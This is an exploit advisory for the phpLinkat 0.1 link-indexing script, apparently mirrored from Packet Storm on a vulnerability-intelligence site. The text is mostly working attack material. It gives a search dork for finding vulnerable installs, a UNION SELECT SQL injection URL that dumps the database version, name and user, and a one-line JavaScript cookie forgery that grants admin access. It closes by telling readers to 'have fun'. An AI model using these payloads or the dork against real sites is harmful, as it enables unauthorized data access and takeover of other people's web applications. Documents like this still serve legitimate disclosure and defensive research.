Lucene search
phplinkat-sql.txt
🗓️ 28 Jul 2008 00:00:00Reported by Encrypt3d.M!ndType 
packetstorm🔗 packetstormsecurity.com👁 16 Views
phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit. phpLinkat is a free link indexing script written in PHP and runs on MySQL. The script has a SQL injection bug and insecure cookie handling
Show more
`######## ## ## ###### ######## ## ## ######## ######## ####### ########
## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## #### ## ## ## ## #### ## ## ## ## ## ##
###### ## ## ## ## ######## ## ######## ## ####### ## ##
## ## #### ## ## ## ## ## ## ## ## ##
## ## ### ## ## ## ## ## ## ## ## ## ## ##
######## ## ## ###### ## ## ## ## ## ####### ########
################################ !R4Q!4N H4CK3R ###################################
#
# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit
#
# Founded By : Encrypt3d.M!nd
# encrypt3d.blogspot.com
#
# Dork : "Powered by DesClub.com - phpLinkat"
# Description :
phpLinkat is a free link indexing script written in PHP and
runs on MySQL.This script is suffering a sql injection bug
and insecure cookie handling.
# phpLinkat : Sql Injection Exploit
PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*
# phpLinkat : Insecure Cookie Handling
/admin/login2.php:
6 : if( ($username == $cpusername) && ($password == $cppassword) ){
7 : setcookie("login","right"); <<< wtf!!
8 : echo <<<EOF
Exploit:
javascript:document.cookie = "login=right; path=/;";
Then goto "phplinkat/admin/",and have fun ^_^
#End
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo28 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4